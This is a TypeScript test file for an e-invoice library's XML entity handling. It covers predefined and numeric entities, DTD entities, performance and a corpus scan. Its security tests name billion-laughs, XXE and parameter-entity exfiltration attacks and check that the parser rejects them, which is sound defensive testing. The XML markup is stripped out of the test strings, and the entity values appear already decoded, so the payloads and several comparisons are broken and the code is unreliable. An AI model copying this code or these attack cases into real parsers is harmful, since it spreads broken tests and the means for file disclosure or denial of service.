import { expect, tap } from '@git.zone/tstest/tapbundle'; import * as einvoice from '../../../ts/index.js'; import * as plugins from '../../plugins.js'; import { CorpusLoader } from '../../helpers/corpus.loader.js'; import { PerformanceTracker } from '../../helpers/performance.tracker.js'; tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => { const performanceTracker = new PerformanceTracker('PARSE-09'); await t.test('Predefined XML entities', async () => { performanceTracker.startOperation('predefined-entities'); const predefinedEntities = [ { name: 'Ampersand', entity: '&', character: '&', description: 'Used in company names and text' }, { name: 'Less than', entity: '<', character: '<', description: 'Used in text content' }, { name: 'Greater than', entity: '>', character: '>', description: 'Used in text content' }, { name: 'Quote', entity: '"', character: '"', description: 'Used in attribute values' }, { name: 'Apostrophe', entity: ''', character: "'", description: 'Used in attribute values' } ]; for (const entity of predefinedEntities) { const startTime = performance.now(); const testXml = ` Test ${entity.entity} Company Text with ${entity.entity} entity `; console.log(`${entity.name} entity (${entity.entity}):`); console.log(` Character: "${entity.character}"`); console.log(` Usage: ${entity.description}`); try { const invoice = new einvoice.EInvoice(); if (invoice.fromXmlString) { await invoice.fromXmlString(testXml); console.log(' ✓ Entity resolved correctly'); } else { console.log(' ⚠️ Cannot test without fromXmlString'); } } catch (error) { console.log(` ✗ Error: ${error.message}`); } performanceTracker.recordMetric('predefined-entity', performance.now() - startTime); } performanceTracker.endOperation('predefined-entities'); }); await t.test('Numeric character references', async () => { performanceTracker.startOperation('numeric-entities'); const numericTests = [ { name: 'Decimal references', tests: [ { ref: 'A', char: 'A', description: 'Latin capital A' }, { ref: '€', char: '€', description: 'Euro sign' }, { ref: '©', char: '©', description: 'Copyright symbol' }, { ref: '™', char: '™', description: 'Trademark symbol' }, { ref: '°', char: '°', description: 'Degree symbol' } ] }, { name: 'Hexadecimal references', tests: [ { ref: 'A', char: 'A', description: 'Latin capital A (hex)' }, { ref: '€', char: '€', description: 'Euro sign (hex)' }, { ref: '©', char: '©', description: 'Copyright (hex)' }, { ref: '™', char: '™', description: 'Trademark (hex)' }, { ref: '°', char: '°', description: 'Degree (hex)' } ] } ]; for (const category of numericTests) { console.log(`\n${category.name}:`); for (const test of category.tests) { const startTime = performance.now(); const xml = ` 100.00 ${test.ref}C ${test.ref} 2024 `; console.log(` ${test.ref} = "${test.char}" (${test.description})`); try { // Verify entity resolution const resolved = xml.replace(new RegExp(test.ref, 'g'), test.char); if (resolved.includes(test.char)) { console.log(' ✓ Entity would resolve correctly'); } } catch (error) { console.log(` ✗ Resolution error: ${error.message}`); } performanceTracker.recordMetric('numeric-ref', performance.now() - startTime); } } performanceTracker.endOperation('numeric-entities'); }); await t.test('Custom entity definitions (DTD)', async () => { performanceTracker.startOperation('custom-entities'); const customEntityTests = [ { name: 'Internal DTD entities', xml: ` ]> &company; &address; 01-01-&year; 1000.00 `, entities: { 'company': 'Acme Corporation', 'address': '123 Main Street, London', 'year': '2024', 'currency': 'EUR' } }, { name: 'Parameter entities', xml: ` %common; ]> &company; `, description: 'External parameter entities (security risk)' }, { name: 'Nested entity references', xml: ` ]>
&fullAddress;
`, expected: 'London, UK' } ]; for (const test of customEntityTests) { const startTime = performance.now(); console.log(`\n${test.name}:`); if (test.entities) { console.log(' Defined entities:'); for (const [name, value] of Object.entries(test.entities)) { console.log(` &${name}; = "${value}"`); } } if (test.description) { console.log(` Note: ${test.description}`); } if (test.expected) { console.log(` Expected result: ${test.expected}`); } try { const invoice = new einvoice.EInvoice(); if (invoice.fromXmlString) { // Note: Many parsers disable DTD processing by default for security await invoice.fromXmlString(test.xml); console.log(' ✓ Parsed (DTD support may vary)'); } } catch (error) { console.log(` ⚠️ DTD parsing: ${error.message}`); console.log(' Note: DTD processing often disabled for security'); } performanceTracker.recordMetric('custom-entity', performance.now() - startTime); } performanceTracker.endOperation('custom-entities'); }); await t.test('Entity security considerations', async () => { performanceTracker.startOperation('entity-security'); const securityTests = [ { name: 'Billion laughs attack (XML bomb)', xml: ` ]> &lol4; `, risk: 'Exponential entity expansion', mitigation: 'Disable DTD processing or limit entity expansion' }, { name: 'External entity injection (XXE)', xml: ` ]> &xxe; `, risk: 'File disclosure, SSRF', mitigation: 'Disable external entity resolution' }, { name: 'Parameter entity XXE', xml: ` "> %eval; %exfil; ]> `, risk: 'Out-of-band data exfiltration', mitigation: 'Disable parameter entities' } ]; for (const test of securityTests) { console.log(`\n${test.name}:`); console.log(` Risk: ${test.risk}`); console.log(` Mitigation: ${test.mitigation}`); const startTime = performance.now(); try { const invoice = new einvoice.EInvoice(); if (invoice.fromXmlString) { await invoice.fromXmlString(test.xml); console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!'); } } catch (error) { console.log(' ✓ Parser correctly rejected dangerous entities'); console.log(` Error: ${error.message}`); } performanceTracker.recordMetric('security-test', performance.now() - startTime); } performanceTracker.endOperation('entity-security'); }); await t.test('Entity usage in e-invoices', async () => { performanceTracker.startOperation('einvoice-entities'); const einvoicePatterns = [ { name: 'Currency symbols', examples: [ { text: 'Price in € (EUR)', entity: '€', resolved: '€' }, { text: 'Amount in £ (GBP)', entity: '£', resolved: '£' }, { text: 'Cost in $ (USD)', entity: '$', resolved: '$' }, { text: 'Price in ¥ (JPY)', entity: '¥', resolved: '¥' } ] }, { name: 'Special characters in company names', examples: [ { text: 'Smith & Jones Ltd.', entity: '&', resolved: '&' }, { text: 'AT&T Communications', entity: '&', resolved: '&' }, { text: 'L'Oréal Paris', entity: ''', resolved: "'" }, { text: '"Best Price" Store', entity: '"', resolved: '"' } ] }, { name: 'Legal symbols', examples: [ { text: 'Copyright © 2024', entity: '©', resolved: '©' }, { text: 'Registered ®', entity: '®', resolved: '®' }, { text: 'Trademark ™', entity: '™', resolved: '™' } ] }, { name: 'Mathematical symbols', examples: [ { text: 'Temperature ±2°C', entity: '±/°', resolved: '±/°' }, { text: 'Discount ≤ 50%', entity: '≤', resolved: '≤' }, { text: 'Quantity × Price', entity: '×', resolved: '×' } ] } ]; for (const category of einvoicePatterns) { console.log(`\n${category.name}:`); for (const example of category.examples) { console.log(` "${example.text}"`); console.log(` Entity: ${example.entity} → ${example.resolved}`); } } performanceTracker.endOperation('einvoice-entities'); }); await t.test('Corpus entity analysis', async () => { performanceTracker.startOperation('corpus-entities'); const corpusLoader = new CorpusLoader(); const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/); console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`); const entityStats = { total: 0, filesWithEntities: 0, predefinedEntities: new Map(), numericEntities: 0, customEntities: 0, dtdFiles: 0 }; const sampleSize = Math.min(100, xmlFiles.length); const sampledFiles = xmlFiles.slice(0, sampleSize); for (const file of sampledFiles) { entityStats.total++; try { const content = await plugins.fs.readFile(file.path, 'utf8'); let hasEntities = false; // Check for predefined entities const predefined = ['&', '<', '>', '"', ''']; for (const entity of predefined) { if (content.includes(entity)) { hasEntities = true; entityStats.predefinedEntities.set( entity, (entityStats.predefinedEntities.get(entity) || 0) + 1 ); } } // Check for numeric entities if (/&#\d+;|&#x[\dA-Fa-f]+;/.test(content)) { hasEntities = true; entityStats.numericEntities++; } // Check for DTD if (content.includes(' { performanceTracker.startOperation('entity-performance'); // Generate XML with varying entity density const generateXmlWithEntities = (entityCount: number): string => { let xml = '\n\n'; for (let i = 0; i < entityCount; i++) { xml += ` Text with & entity € and © symbols\n`; } xml += ''; return xml; }; const testSizes = [10, 100, 500, 1000]; console.log('\nEntity resolution performance:'); for (const size of testSizes) { const xml = generateXmlWithEntities(size); const xmlSize = Buffer.byteLength(xml, 'utf8'); const entityCount = size * 3; // 3 entities per field const startTime = performance.now(); try { const invoice = new einvoice.EInvoice(); if (invoice.fromXmlString) { await invoice.fromXmlString(xml); } const parseTime = performance.now() - startTime; console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`); console.log(` Parse time: ${parseTime.toFixed(2)}ms`); console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`); performanceTracker.recordMetric(`entities-${size}`, parseTime); } catch (error) { console.log(` Error with ${size} entities: ${error.message}`); } } performanceTracker.endOperation('entity-performance'); }); // Performance summary console.log('\n' + performanceTracker.getSummary()); // Entity handling best practices console.log('\nEntity Reference Resolution Best Practices:'); console.log('1. Always handle predefined XML entities (& < > " ')'); console.log('2. Support numeric character references (decimal and hex)'); console.log('3. Be cautious with DTD processing (security risks)'); console.log('4. Disable external entity resolution by default'); console.log('5. Limit entity expansion depth to prevent attacks'); console.log('6. Validate resolved content after entity expansion'); console.log('7. Consider entity usage impact on performance'); console.log('8. Document security settings clearly for users'); }); tap.start();